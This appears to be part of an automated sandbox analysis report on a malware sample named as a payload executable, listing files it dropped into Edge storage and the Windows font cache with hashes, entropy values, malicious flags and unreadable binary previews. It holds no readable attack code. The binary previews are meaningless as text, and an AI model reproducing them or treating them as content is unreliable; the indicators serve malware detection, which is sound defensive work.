                                                                                                                                                                      Preview:2023//0.E%b..Ug...Uo.j .B..I.w...+.>V........_9.d.P.(5|.f#.Q....`.....P.].Q..(4........o/.D..>...N=...>....". j....Q.|....w|.TZw.l#.....t.X._].(...n.M.!......A@^N..pu.t.9.),.\u.P.....(k....i.n...:1..U..}.....N..5|:g...+.Pz..%....*.<..xqgG...E7g..N<..>..AQ..... .?.........B.........q.2&..-.>n.I..z.[....5.....L.Y...>..O.\J..tN'.........8.u....dq76..k.l].3EWY.!...z..G.*.X.. .......s...N....&.gh.^.S.=.............%..9......W...u.W.!.3l....$..\<.}F.0C..o|.9.&.....e..n.sP........}0Ru...3..?....i....&\...L..|F..Ms.O.o5... I..>.@..V.">...: ..w..,.[.;0.p...X.0[sN..(.+.XuQzk...mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):395
                                                                                                                                                                      Entropy (8bit):7.46403890768861
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:12:SThbe1n+DXwWyU5UA4xDY3Yh9kHiSSUdNcii9a:d+DADU5gDY3+9kc2bD
                                                                                                                                                                      MD5:A85FB9F49232B957D07556F25572D64A
                                                                                                                                                                      SHA1:C2EEABF84199D4FF739AB50A307EAE8059709A07
                                                                                                                                                                      SHA-256:3FAE46ADC9820CC32203E5B9E5E65DB58AD9590A30739DF78FB3E1D4101EAF49
                                                                                                                                                                      SHA-512:81800CC142A9C83F6B9274F36FF0FF637BF6AFF4A2EED5DF83C0BC989F2D3F556590AB644ED7EC4C85121C66AEA3ECD7EB65ED383A7AC43E3CFF9956AC7C9C7A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:*...#g....x.q....g.#.3:.-...?....:......x..]...N.P...b..t.D..........>Rr.c...U.....F...$(.:~.`......S..0.8b...H....0......._2.Hho.&....iMf."..[..6..b..O..eS:...o...T..=...K.'......#].....&..!.l....9.....<.:.L.|;.P.....`..J.....m,.?._.....hH<@.......G@...X....2<...;.....9....AA.G...S$".OeER{d...k.K..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\remote\edgeSettings_2.0-2f9188b68640dbf72295f9083a21d674a314721ef06f82db281cbcb052ff8ec1

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):129419
                                                                                                                                                                      Entropy (8bit):7.998632769545408
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:3072:Lxayt2aVDT0tPPQ00MgKM1P/w3v9QYDwVKrnde:LxECDKraKKtJVKrnk
                                                                                                                                                                      MD5:F53D7E378F43D4FFBF8659133097A77F
                                                                                                                                                                      SHA1:691434B8D4B0A464B1DF23CA207D1F92419E9D9D
                                                                                                                                                                      SHA-256:A73D4A4A691ED21EB4A9BE57B83FB53841FC6ECA169AB9F8243A0EC5F3503198
                                                                                                                                                                      SHA-512:D882A4743DD13C1D45B86C721E09E32B3324099A26D08E77150F0CE199EA298B20A6B1825C998383D2FA476A1A10608A4036AF7D129CAE5B9C2DF3AFA0C8C3BA
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:{.. ..d......k7.Z.1..y....-.+....c.........%.e8|.h_.lG.;.L.;.....Gs.........-P~y:vy,.Ek/.3.9b...VM..O....rm.U...........M.L.Rm..K19...!p..E..:.f.sY ...X...v....f..1...Q:.s.Y......l~vG\r ..v....wUa..]..C.".t.E.l.|,.+.[.%..q..q.>5.r..*..^>?.<.r>t=.3.=l_D7..Z'.....)E_......1....=h...#z.A!\.........$m.a)P...N.+..M...R....U.1%a{.....H.._..3&...p{KsD...z.,_.+..n...T...E...S....U..+.H}.h2.rA.w.(..AIL...0j..B.N..4...`yt.p.j.I...!'..D"0.4."....B..wF..|.]..}.X...; ...........>h'k.lj.".wEq>=......T..].*j.4.M..>...fd.j......nc.e.....]..G^.\.*...R.u...9....n ..n].3.[-....o........":.Cd.b.....V:{.9.^.;.)..i|.;...'2.^.......u.Xr<X...j.........w...,.5ESb.3....;-../....[.....:sj..6R..-...H...s6..pR..,.....f.y./`.D.K...|.[..,....G..@v....J.A...[&8..9...3D.E.7...a.n~..%...y.=...(w...,x....nbA~-....X..j..-!"....Y@.I.:.r.@7...O..t..vCB.v...3.}:.#.*..fpX..tQ.s.))../..?...K1f.>....4..:..1;GV..HFG..X....I..k.O..G....d.......t..x7I.....Kt..K..W.x. g..~.....-.=

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Display\23001069669.ttf

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):238254
                                                                                                                                                                      Entropy (8bit):7.233419978281234
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:aw6wOlnQsZ7KoZB4wYBI3khfoY/kPBPAaa/dIDiAL:aV1xPZpvY+UZoYQIIDLL
                                                                                                                                                                      MD5:1523E96A67BE35C30848825C2D180281
                                                                                                                                                                      SHA1:51CC1FAB1D2071043AECA42FD81BF2B0424A2575
                                                                                                                                                                      SHA-256:60E7D720AB6D0CEA79184DE654EE585545F004409A67B2989AEC88919D610552
                                                                                                                                                                      SHA-512:6D2F75EA16664D1444F6B649799F24C49167CE11A53E80C043299081909A9E00F6DB333EF45217A6105BD1471B88B1B35C8890B3B856999D425212295254EE87
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.......%.F..@....%"j.K2...iu.7..S..G..e.O.~!...}.1>k.4......h.7.%c/..C2.N^}x./X+....yv&..[....e[..=}w.{os..a.S.,.H..<~..J=.....4._....]..A.._u... ...m..Y.,.....Y:...-.c.r..h.6.UL....l....Z,.rP..KP!....#.P..1..y...8w...C...k.....(.8?.HBP>t"........z.y.....j.._..I".o@;...V.D.n.G[.Q..mg.....@6..;3.+.i.[...ZC@...<3.-^..".D..Q.......U...Bs.!....d@)Y.v...L.%....W.lY......zVh...xXA.9c...w..G........&~l.|7....e/.!...k)...[...?.#T..G9.nXT...c..e`.cwm..9b....Ye...-D....YK..........V?#.^..O..h...G..w...;.....}.qp?..\.E.tr..ePj.(....P.aI........J....c.Li.....N...%...(D....\......}}z......ZeM.....4......o%_.4i.A..fl......*.....wD...".....@t& a.........a.E._A5.[.x!.f)...r...l*[y.b...{J.d,..s....k....S+u.C@)z...g|....!......j.N......-..,_d...w~..jFF9k ....U.X(........8v.jZ*..M[....$....>...vvK&...w..%(..8....'.E=.q=..Ng.f....`.2K...k..jG.E.}.......j.W....p.,.._\`.4.`/g.$.....%....&.......Q~E........v.Y...V.$..E.S+!....`....|.N.F.)#.B4...x^.i...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Display\28367963232.ttf

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):240882
                                                                                                                                                                      Entropy (8bit):7.262960118061741
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:nH4X8PbTuquNWaqcg2nhDVLgeeOtzg973hbX6pvQtbuKvcJJCgtrsE0ml:nyo33mWaquZVVeagPqJKkJYusEpl
                                                                                                                                                                      MD5:143172285A1FEB8197421165F6B810F1
                                                                                                                                                                      SHA1:1F0E7BA3A25DD7A1A4765E5AC83589C5F75DF466
                                                                                                                                                                      SHA-256:A5124E566B5BC4BD839F1C9140DAB556EC86C46EF35B5F6B744A148E5033EB1F
                                                                                                                                                                      SHA-512:A61992218A872692FC82F664F4A4F56475EDEA6CB1F009A54FEB1DF83D7206BFB721D5A91842E530A589622F531364F5C7A995DF932B5E58FE21F1D17CAA8973
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:........^...R....+......s.a..3(U.>%...+.a.d.;..af..HUOd..C^".#lS.b0.BZ.]?.[.e.Tb.#x.n..N..(Rk.c...y7.$.^.x....n!..}....Za.;..^.\^*.......a}CX........3.H....q.*......|*JK#.]....0Fd.HTKm.%$.b.D.[^j..K.....L....+e.?:.X.+....xZ.6..mC....G+....;.....~.|_...N...x.q..6..G.....o[...([.. .7.m....6.V.A..3.B..H:~....("..R..0=..h....U...))..}.y....?..m..V.[...%.B....f.7>G%......:.............\...!kvbW._...k...J.E.?.GY...........G.....<.2.k...I...|..LR...HMG&P..fW....J'...q.........zL..V.-RA...jT2...N..7z~|..........7.M{...3+..>A.Ya..i.3.s..|.=.'F...,.M7g.S. \x....D0.kz<..8.V..y..$=h../GZ.c.Vw.+.F..r515.V....p......k..Km(.$.%^..VV.......X].e.....Q...{......+.|S.....gT.f...2..2. u%.|a..aj$.S7.....I.8...B....]pM.X"..V...y@,........g....r('\q...%..r..5.}...s....A.HU..5..*........Ha..UP:..1...>Q>R...s....b..{.T65A58.1iR...R.....k..z.t...z.s...._h.8.o...^....az.....C.Z..={...y....6b.\F../...z..N...._o...P.9..l2&.N/9.j..+?..vgtD......H..0.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Display\29442803203.ttf

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):241750
                                                                                                                                                                      Entropy (8bit):7.261255030960053
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:eoqG0t+1ZNvzGJzMZwcOwk/IYL8tBR/tfUABlMk5vr2ioEyLfjFt/AEsWTqPvnhC:M2vzdqHGtBRFftMUbojr/LsWSvq2g
                                                                                                                                                                      MD5:ED77849EA61D482EDBE8A7FF324BC956
                                                                                                                                                                      SHA1:6E5E0E11D4CF0A2C414A98B3E61E7E9C39369CA8
                                                                                                                                                                      SHA-256:147A7487273C3E6F4E3CCDA1C34BCD0D0A614C0D106F48B8A0C151BB5639DACF
                                                                                                                                                                      SHA-512:4DCF61A7C2ECCACB6D1CEE0F0FEE89C882C8F56E8196D676DA781F181955ABD6799F2B5732479A84275EBDF058338616D3C7428CCD2DDB28764D378A7A8D0762
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.......Wd.9K.z/.....+#..1.p.adq.[.....i..B....G...GqL....$.B.W..@~'..B. Y..w.Jm.c..b.".#S..E.d....~...?]..J/..t2.2K.3....G../. ....D...(.)l.}..y."J..#..XUq*.....*.5%{.'p.j)...{......=...a_..u.J\K.....Ve...BHP(.r.. ...q..5c.b..F6#..E7..b:V@8w `X..*....._..=.U....V<K...su=...9v;-!\...."...q!..E....?...q.v.t9....B....>.].g........7l..T...."....~..f?n..4.M...l.."..t&c.(TC...F..4........}L..4V] ....<......H.Jj.....RH.'.n.o.,...|......w......v.Zj..W.2CC..X....}.-....F.q..c.T.;p(.(............}.V.).....j..j6. .0....$..K.|.xjQ:...HT.|..M....-4...Mz.2.Y.>.Dp.<!.+C..Bz[&...^..0........0.}.Y..F]pj.._w.]..S..]-.-.K....oM.....,a.u3%.x....6J.Y..*..e1.8....o&..&A....R..&Ii....fY.m.b.l...3+n..Ew.VQ.$...?..L.....=...q.:N..O+.6.E......%.C....WU.Ot>^...z..^;..I./5......r.X..6e6...1..+......x.'.!..J......iK...b.......>L..hwD...fX.....t`....f~...r..&..>d...&.....a. ....%..u...2.z .Oz..q....f............85......).m._`..Y.?....9..ONm'...Q..ZJ9..].K....i..eZ

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Display\30264859306.ttf

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):238962
                                                                                                                                                                      Entropy (8bit):7.233155882890057
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:99zw2VvHzdzV6MqLWt9ANFYHXfg9uAG7pjX0ZoXklhIqsetNVPxBvdbVp+AxHvx3:bzw2V7j9AeXfg9qkyU7PxBvdb/tDpA6
                                                                                                                                                                      MD5:AD11B9D72DB36C6C98A79CC0BCC76B38
                                                                                                                                                                      SHA1:E7FA78E6FDF9D3E1B662F18A69BE760B9885C230
                                                                                                                                                                      SHA-256:DBD94EBEEACB7FA72B248E01AD408F04FBDE8D17C4FC91DDAB873EC6E3C8CADF
                                                                                                                                                                      SHA-512:1D14B1EEAFA43D704EB7F0FEB5112AA6816F880288A45DDC0B7170603BCD2EA7DDD4BCC9C225C002C4BF784C5AF2F1C9EF4FA0932DAAF06AC303F39F1EF3BD9C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.....8..........2..>#..m./.6.!..x.5,.....D.&..|Z(......-Y.Z^8.8IWX..G.....)t..vE.m.....s.O~09.q.....6.-..P.Y..$.y.E...F>.<..Y.).J.G...?..P.g.q..C...t8E..KN.u..;.Z..!<......Ka.........&?....P.M.4....~...G.1........T./YdY.&.,.y...Y...J."..f.9cw..t."..L...E...9......^.x..M.,.X...C.....E."..A.~!.!0..Ds......7..@..WW..>...r..].......0PC.v...."..Q..glm....o........,?.n....j.\A.ehN(r....r.`../.*.....i.k.3.....C..>_V.s.1..&.X..0".d.G.o2R+.0fY.TQ...qq.l|Ev..?..f.....N....:...X.`l.rf}..g..^..Ppn6..y......f%..2S"U..3&H.......}.......I.....+.2.5.....O0...4..".5{.l3...J...L.~sq...XB..t..IF..l.V.]=..)....D.6....z`".4.{.=...T...8......Z....i2.\.*..0..)...*.........S..5d..}...k..,.f...S.A\...~....\.%.&.$4.....D00..(./..N......2.(.4S.0a.V..3.....Q..k.../...3.......X..)VZ..wrQ..M....w..|..B.u..d..a.S...AyU.$a.G}..=b..2.;..o........WL@PQ:....|oU.=.^x..c...../...F.5.9h.....}..[.KHsBB.g<$0:.o...d[6....x...e,...y%....EW..9Zft../B.+..K.]`....kT..XK(Bct....,....`

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Narrow\24153076628.ttf

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):237902
                                                                                                                                                                      Entropy (8bit):7.23954908489416
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:0hhmH2gCU7ijgEE3BXH+y5KFXXM2JuzsuV4icA:0hT/Ad3+y5UHMnznV4jA
                                                                                                                                                                      MD5:D1F5DB80B4E7D6C7027C22C706485134
                                                                                                                                                                      SHA1:989BFEC9BE5EECF06E778F27D9FD3C9E443EC8C4
                                                                                                                                                                      SHA-256:DD0E3BF0526E6F33F71CAD6166BEFCFC3C3576B257781723D9CF6544B823262E
                                                                                                                                                                      SHA-512:C5324F81348E06FD1FB70366ED3B88102526DADBE488B90ADE416F773940074CCBB9ACA86141BBA8BECE617DC1EA7348250D842AD720148DD39F93466D066B44
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.......*y.Bp.J.&.......DH.$9,..hi@#.4L..{D.4..p.C.h.4qnp..bAO._.IE.N..(...k.s..>.W..{.|..K5h.yL.a.....z._P..d..n.IJ7....+M>.e.|....F9..ce.Q.G.......*w.k.;M...`..`~;m.}.mk..~C.../>...2@........{.X.7......D...-...Ph...g<.X..V.RR.9M6...k/.....z=..d.E.EX..>&.a....9b...k.4..].T. Y.;m.3..... ..p.......6R%.wi..K.... y..S..N`:..'6.xf~...*c...x}R..?..j.%K..aB...v.....E...e.}..)j...|U~!_..R...B..jA.+"......J.p.......E...l..y..6..pT.q.-e..J...@..k.n_5.............<..<...B.A....%ZC6.@[.<.c..%n.w...r.L.P.H...rJ....3M.Sx.<.y..v;..c.~v.L....J7.....)Y/5.L..H.'.@...(.W.....,.FL..6......b....x.....#...-.....A... ...a..p....+..$......UB1...}X....XDoO"..%.T..,.X.^.m.dn.l.2..._.hr.0.R..2q...5..&).%..?.E.y. fl.p..p....m...?@..D..6.1.._-S..%..[.....`..n=D-).s.;..wN.....rR.E.!$.M.j+...*....ur.y...a.`n..8.LX.m..~...V.Z7..<..B..<..O....~S'.....".x..M.,;00...X9..9i.8.-..}O..Tc&.I..4b*2..z..q.....&..g./......e.L<.....3..j&s@..~.0X{V... o..'.........v.i..;f"....@

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Narrow\30284701761.ttf

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):241378
                                                                                                                                                                      Entropy (8bit):7.25899868940584
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:dpAmH8JF8wzYqQ2ORQ2FRwSXFP4JiIasMOphDtPcwBQ:dprHKDzYTRZ/RXFpBgJtPcl
                                                                                                                                                                      MD5:F3EEF05368C0DB42F5F733D3074624ED
                                                                                                                                                                      SHA1:767A3C1AB8E6A175B03B303A9D257E5120F950A2
                                                                                                                                                                      SHA-256:E308F1606E6ED6360C627097A3A1D1BE262852B176314A85369F0E301D2C4BFB
                                                                                                                                                                      SHA-512:8AF47D95FBEC3EA483355212AF5D4843CFCC619052EC1375268335CC9027B2A14492BB484581AD1BBB7D660C85D01468884FA0BFEB3A0EA778C5721FD6B60EDF
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.......)..}........E....#n+....w..D..a.R.- ..&...#.%DP......@........N.un3...E._:U.I..s../BN.K1$.....Bq.s..b..:...Yk....Hl%.qn....t..M....,..:......n........ID6,^..j.~Y......L..1...>C3)+.9\.k.Y7..bg"......~r.e..D......"..e._...G..j..:..nL...`.lP.K.J.i..7...N...s....,.hR.).=A..VW.8!].......V.U.G .Fit!{..d9>`...;...p......._..3Q..J...x.c..!.0.c.p2.%..#...Ch.w.wpt...1.rJ...9.?.c...-2$CQ_H....a.G..{....g..@..7.a......+.D.j..E.TH.....#.....3X..Hq....`AEn..c._.:....^...4...|.(...=J.U..UK.bF...Q.....U....S..e...3.{'. .d...$|..[....._.._..8.....V...f`..o}........ .......5...6.R.....L.+p.1.<w..PJ...8.a..7.>....j..g{...?..$L..@.k.;....."y8.....w..:..Ize.....?1 5....J/.......[.+...p..G.....;.e..1.].@!X.."!'..F/..JV.a.....{.+....y.....i.w.,'..F._.."....>k...>f4.c.K}.9..A)L.:..+P.1....L..M...s...HaI.O....r.0.@%....IK.....TM.[=.......o9...%].R...2.....B._...2]..I@..T...o..fZ!.....@^.O...A..... ..../`.xAsM..R....5k.P.q...R../..s$.WB.......Gb.9....fj..KK

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Narrow\31558910439.ttf

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):237738
                                                                                                                                                                      Entropy (8bit):7.239543687782613
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:3PE6MTxbUeUqMvHat2YssgFfr7C7zuDPyIFlpJLRFNXJykOdG1KemKy1EAsP0Uji:fED6eUYssgF/q4pJlJykOdGNmdqjcd
                                                                                                                                                                      MD5:3915ECE91E6BA8BA406278D79B68BDBE
                                                                                                                                                                      SHA1:2633D065992635D488845B4AAE8A224E5E0FFA70
                                                                                                                                                                      SHA-256:ECE0C35CA7C374CECB2805AA14DC69B94910ADA47A64704D3FF2AE0D10F2C9B3
                                                                                                                                                                      SHA-512:0A9E21CCCAEFD628F0941A496028CFD8464EC6B74755E04218206B7958384BD4122BCEF77235620A9150AD9F4C820F65A413B983B195286763914047C3F71BE5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:......<...}_..q.2.]U=-.!..`l..K..5G!a4...4@nj.9..t.c.i%.vn..u..u..[._....pC...e.e.C..s....7...a.8.o...MB..%...k.Q.n.L(N......Ns..B.k...3.%...Q....^.\.Q.....d.T^{3%..{.=......}...9.......sX.....:.|.=.:e..+*.t....K.[.)[......[.v....... ....=.'M..$W7.....F...,....^dB$..vny.|.7.,.v~.2..X.UM..Y....\\....#../U...%.X...Z..5:.X..........j.j'..vMI.oS.H......H.3.T..'.".&.]C.<...N4.x......>2sr[.....^.........A.\...k.,.8..+~..=...l8D..Y..z2He..\..'W7.....A.)x.T..-....y...q.M.3...>.Q.g.~..Odx...!?..}.......1$s..E"......W..@S..........H.....i+9.N.Ta.l.6i.p.7.i..4.:.Y[T..(. .Q.zT$.F..6.>l_D...y..O.......Ek.5...../....\.qBj.I..........t..H....JB..F..o..kMi`..s.....P.Z.?.<.....=.g.....M...z./G.....~.2+..$.]U.E..b".S.w.b.]..~X6.Y.'t27Kg..^C...^...u....5..ZA].x..@.......'.R.Hx..2.0.z_d...8...N4hF....#.P-[.Ht.0`._ ...~0}.G&...#.u9F.#.....<V..F..hMu.Z..h.....C/../......>"(@w.g..X.T..:..D....g+.ee..c...C....x...H.x.H..C..T...Ab.......1.x.."a_.N.H......._?..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Narrow\37262344671.ttf

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):240706
                                                                                                                                                                      Entropy (8bit):7.265403325480062
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:VkN7ktd7exXHNUE2afGETWfCsq5UE+iXSQVuNRA27gMoi6tc7UvMOTZUqeZ/qf:WItdiXHaE2cGERj51+iXSZv6Q6yqU/qf
                                                                                                                                                                      MD5:6887690412322946F0F064D07618F105
                                                                                                                                                                      SHA1:03841957F2652DAEB8FBA042830DB552CC2DE8C0
                                                                                                                                                                      SHA-256:7E0E2F946A966E032C07E5737F09DBB4FDF3F292ECFDBBDB89E549364844EBCA
                                                                                                                                                                      SHA-512:482B7439FC17AC66F290E55503D7159283B119CE786836300CA13C9EB02EB443E7855A9091743FF8B09F99B948B26042F713BDA92476A0A90DE670CC6718301A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.......SM^.............1W. ..!.bHca)..._U.l=.gR...x.l...0?.V.I...W.".%......6..c.N.F../.i.....I.....C.fS*.}.S..p......'..wr..N....sscy....?....A....;:.-.*.. ........{_.....3y.uB6...G.l(M.......e.C..O.....$..`.W.A.l.v..}<.:....;.....)CLT...s.3..4.j....A.I..|x9..dk...o....u!..>iW#x.Z.....5......-...m.....'...r...i|e./OE......2'....jwM.&.....]"W...r...$L.'.>.....a....d.....N...;..$..H+.Du.*....A7Y.9............N......5pP>.-...F!._.V.9'..x...?Q..Cw.....BzZ.s.K.o/b66.-.....TM..c..Bq...%.2.....lH?....~-E..@.f..L..3tpd9c..,Q[.........4.|0..].x..:....L.ygk..[....Gc.1)...2.........o...h..7..@RQT.M......Ww.T..F...>`a..{...'.OW..O...DZ..W.s..L-;.......,..m%...p.@..:fP...U[...\ .4..\.=g..4!.....{.s..\.f.p..^..._.Q....1.^(..8/.y...j...<...'..i..M.8.S..v.......V.`.6M.c.a\..o2.":O^.9.Z..f.o'%.D..iT.o.D|......X5-..?........{._X.J.|.<..:.F.3......U1~.I.... ..Q.@.....9.4....ia.\....F)F.o..e.Ty.}.......2.C....>.t}..VB...v...._|......... T...t......6M&...>.$.w

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos\27160079615.ttf

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):238518
                                                                                                                                                                      Entropy (8bit):7.236212276173533
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:MiFqbNJ3Kb1d0knW7Q+8P26ixIoShjgiQxvdb/LIAi:o5SFW76PuDbd3Vi
                                                                                                                                                                      MD5:E8499768C8BFED85EEEB7FA3B8D09A42
                                                                                                                                                                      SHA1:BE84FC750A07566EA3984A21DFDE57DC9B733460
                                                                                                                                                                      SHA-256:AFBEF9407212A762151EDE7EE24FBD5D0DB8CF35B216700A2371B8E07831A9FC
                                                                                                                                                                      SHA-512:6AD6A13275E92DFB7522BC57AA3FBD565A2AB0906163827D318D1D1D9ECDA4DFE0C6D8F7CE90FF06F965C322FEC4EF66F814A4CFB9F6F0E0ED736BBC462E6D37
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:......tF.{_/)mB..-.:...w{f.*B..2...1G..a0$o.....B.o...u)k...e.$.U...n$.....w..U.........|.6 .G...Jy-w..o.........7..@J,WA......LD.X..b.......I....0...1.sy.~.;..[W..pa.dv.31..U.....]....EN4+G....F[O..>..h..b.(7.i....uNG.m.8=..s..[.u.V.D.....#xJG](.1.........]..f..!yF.....!k...hL'..@....,...&..D.....X..@.X(H.\...c..>.&.i..K...l/..n.1.kt..j...L..P.S....88.{.....Rv~..]..r...at....;~.Z....d..<.+.......D..(........`q&..D.2.;.2.`....Bv.Ah....\...p..?.C>Bq!....?P.5.o..>...z.).4.0..ZY=...C....S.p{.-..../(.N.r..v...q!.dR.9...?.E..@...t.....*...{@.5.9f..=W/....:n....i.e.c....0v...7.!.....<..so.H.=.z...{c.....w:^_e.##s..S..w5-.c...v.S.@N6..Y[..*..N"..L......-..&.Zh....g[.$..}txsv+1kTB..As".%...I3..e'.e...-...&.u.. ...'....!....r......xY.Jh...:.rY{..vz...y.]..'..0..3..O..........b.<.ha.<.:p..yB{V5.kh..X.IU....}..P...j....\......\.B..G..w..A..Xk.`.>..Q...Vt..p.#.:2z..p.9..I..h..K'.+....;...J@..T..o.x..I]...7.....IsT..n.?.........l....th0..p...8!{w..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos\28315153308.ttf

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):241282
                                                                                                                                                                      Entropy (8bit):7.259065030726638
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:ajAFE4yUxKgtFZYMRk2PKKDc3s+Mcf0QEuGa9GM83mbV8LXe+XRKIvpNl081M:aEoUKyFeMe7p3ADAOTe+Vi0M
                                                                                                                                                                      MD5:DF24F4041CE21419CC1BF129FD478461
                                                                                                                                                                      SHA1:08703B4480DEDB44981CBA824914B34576BE7FE7
                                                                                                                                                                      SHA-256:C92BF22B8B530391434335FC0B6BA5DB601540A71929BEB083D3A599E9A6F15A
                                                                                                                                                                      SHA-512:230D6160D629E755995F8702131D39E9169A5A621059C65EF27CC759887D1B29F84697054FD1BBC09693B1A16C6B7589BED0B604F97761E9806EF5B2F7041194
                                                                                                                                                                      Malicious:false
